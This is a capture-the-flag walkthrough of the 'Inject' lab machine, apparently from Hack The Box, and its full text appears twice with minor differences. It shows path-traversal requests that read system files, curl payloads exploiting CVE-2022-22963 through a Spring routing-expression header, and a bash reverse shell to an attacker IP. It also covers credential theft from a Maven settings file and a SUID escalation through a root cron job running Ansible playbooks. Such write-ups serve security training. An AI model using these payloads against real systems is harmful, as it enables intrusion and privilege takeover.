Inject

Enumeration

Rustscan

sudo rustscan -t 1500 -b 1500 --ulimit 65000 -a 10.129.54.43 -- -sV -sC -oA ./{{ip}}

Ports

Open 10.129.54.43:22
Open 10.129.54.43:8080

Services

PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8080/tcp open  nagios-nsca syn-ack ttl 63 Nagios NSCA
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Website

The website itself is described as Zodd Cloud which is a place to store, share and collaborate on files and folders. There's not much to the page itself, the registration is disabled and the login button is a dead end.

But there's and upload button wich will take you to a page where you are able to upload files.

Foothold

Exploitation

Upload: LFI & Directory Listing

As always I let Burp run in the background and browse the page, click on everything and check what I got in Burp. After uploading an image I already noticed the URL which looked like a typical target for a LFI.

URL: /show_image?img=cat.png

And as I thought I was able to verify it's vulnerable to LFI and even lists directories! But you would have to either use curl or Burp to see the results as the Webapp tries to display the response as Image.

Display: /etc/passwd

GET /show_image?img=../../../../../../etc/passwd HTTP/1.1
Host: 10.129.54.43:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
token: ddac62a28254561001277727cb397baf

...
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
frank:x:1000:1000:frank:/home/frank:/bin/bash
phil:x:1001:1001::/home/phil:/bin/bash
...

Display: /etc/systemd/system/webapp.service

GET /show_image?img=../../../../../../../etc/systemd/system/webapp.service HTTP/1.1
Host: 10.129.54.43:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
token: ddac62a28254561001277727cb397baf

[Unit]
Description=Spring WEb APP
After=syslog.target

[Service]
User=frank
Group=frank
ExecStart=/usr/bin/java -Ddebug -jar /var/www/WebApp/target/spring-webapp.jar
Restart=always
StandardOutput=syslog
StandardError=syslog

[Install]
WantedBy=multi-user.target

Inspect: spring-webapp.jar

First I downloaded the webapp which I discovered previously.

wget http://10.129.54.43:8080/show_image?img=../../../../../../var/www/WebApp/target/spring-webapp.jar -O spring-webapp.jar

...
<dependency>
	<groupId>org.springframework.cloud</groupId>
	<artifactId>spring-cloud-function-web</artifactId>
	<version>3.2.2</version>
</dependency>
...

RCE and Shell

Prepared a shellscript that simply setups a connection back to my machine

#!/bin/bash
/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.139/53 0>&1'

# Setup listener
pwncat-cs -lp 53
# Start http.server
python -m http.server 80
# Shell: Get rev.sh
curl -i -s -k -X 'POST'  --data-raw 'data' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("wget 10.10.14.139/rev.sh -O /tmp/rev.sh")' 'http://10.129.54.43:8080/functionRouter'
# Shell: Execute rev.sh
curl -i -s -k -X 'POST'  --data-raw 'data' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("/bin/bash /tmp/rev.sh")' 'http://10.129.54.43:8080/functionRouter'

From Frank to Phil

While looking around I discovered a folder called .m2 in franks home directory. That folder contained a settings.xml which included credentials for the user account of phil.

su - phil

Flag

The flag is located in /home/phil

Escalation

Local Enumeration

User Phil is member of the group staff which could be interesting.

id

uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)

Let's see if that group has access to something special

find / -group staff 2>/dev/null

...
/opt/automation/tasks
/var/local
/usr/local/lib/python3.8
/usr/local/lib/python3.8/dist-packages
/usr/local/lib/python3.8/dist-packages/ansible_parallel.py
...

Using pspy I discovered a cronjob that seems to run every 3 minutes and executes ansible-parallel on directory /opt/automation/tasks

2023/03/14 23:18:01 CMD: UID=0    PID=5684   | /usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/playbook_1.yml

Exploitation

Ansible Parallel is used to run multiple playbooks on the same time. So I guessed that the cronjob is doing something like

/usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/*

echo '[{hosts: localhost, tasks: [shell: /usr/bin/chmod +s /bin/bash]}]' >> /opt/automation/tasks/escalate.yml

Wait for three minutes and you should see something like this

-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash

Root

bash -p

The flag is then located in /root

Last updated 1 year ago

Inject

Enumeration

Rustscan

sudo rustscan -t 1500 -b 1500 --ulimit 65000 -a 10.129.54.43 -- -sV -sC -oA ./{{ip}}

Ports

Open 10.129.54.43:22
Open 10.129.54.43:8080

Services

PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8080/tcp open  nagios-nsca syn-ack ttl 63 Nagios NSCA
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Website

But there's and upload button wich will take you to a page where you are able to upload files.

Foothold

Exploitation

Upload: LFI & Directory Listing

URL: /show_image?img=cat.png

Display: /etc/passwd

GET /show_image?img=../../../../../../etc/passwd HTTP/1.1
Host: 10.129.54.43:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
token: ddac62a28254561001277727cb397baf

...
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
frank:x:1000:1000:frank:/home/frank:/bin/bash
phil:x:1001:1001::/home/phil:/bin/bash
...

Display: /etc/systemd/system/webapp.service

GET /show_image?img=../../../../../../../etc/systemd/system/webapp.service HTTP/1.1
Host: 10.129.54.43:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
token: ddac62a28254561001277727cb397baf

[Unit]
Description=Spring WEb APP
After=syslog.target

[Service]
User=frank
Group=frank
ExecStart=/usr/bin/java -Ddebug -jar /var/www/WebApp/target/spring-webapp.jar
Restart=always
StandardOutput=syslog
StandardError=syslog

[Install]
WantedBy=multi-user.target

Inspect: spring-webapp.jar

First I downloaded the webapp which I discovered previously.

wget http://10.129.54.43:8080/show_image?img=../../../../../../var/www/WebApp/target/spring-webapp.jar -O spring-webapp.jar

Let's inspect the application using First thing I did go for was to find the pom.xml which can hold juicy infos

...
<dependency>
	<groupId>org.springframework.cloud</groupId>
	<artifactId>spring-cloud-function-web</artifactId>
	<version>3.2.2</version>
</dependency>
...

RCE and Shell

Using the information gathered in the app itself I was able discover that it was affected by CVE-2022-22963. You can find more infos about it

Prepared a shellscript that simply setups a connection back to my machine

#!/bin/bash
/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.139/53 0>&1'

# Setup listener
pwncat-cs -lp 53
# Start http.server
python -m http.server 80
# Shell: Get rev.sh
curl -i -s -k -X 'POST'  --data-raw 'data' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("wget 10.10.14.139/rev.sh -O /tmp/rev.sh")' 'http://10.129.54.43:8080/functionRouter'
# Shell: Execute rev.sh
curl -i -s -k -X 'POST'  --data-raw 'data' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("/bin/bash /tmp/rev.sh")' 'http://10.129.54.43:8080/functionRouter'

From Frank to Phil

While looking around I discovered a folder called .m2 in franks home directory. That folder contained a settings.xml which included credentials for the user account of phil.

su - phil

Flag

The flag is located in /home/phil

Escalation

Local Enumeration

User Phil is member of the group staff which could be interesting.

id

uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)

Let's see if that group has access to something special

find / -group staff 2>/dev/null

...
/opt/automation/tasks
/var/local
/usr/local/lib/python3.8
/usr/local/lib/python3.8/dist-packages
/usr/local/lib/python3.8/dist-packages/ansible_parallel.py
...

Using pspy I discovered a cronjob that seems to run every 3 minutes and executes ansible-parallel on directory /opt/automation/tasks

2023/03/14 23:18:01 CMD: UID=0    PID=5684   | /usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/playbook_1.yml

Exploitation

Ansible Parallel is used to run multiple playbooks on the same time. So I guessed that the cronjob is doing something like

/usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/*

Easiest way to abuse that can be seen on

echo '[{hosts: localhost, tasks: [shell: /usr/bin/chmod +s /bin/bash]}]' >> /opt/automation/tasks/escalate.yml

Wait for three minutes and you should see something like this

-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash

Root

bash -p

The flag is then located in /root

Last updated 1 year ago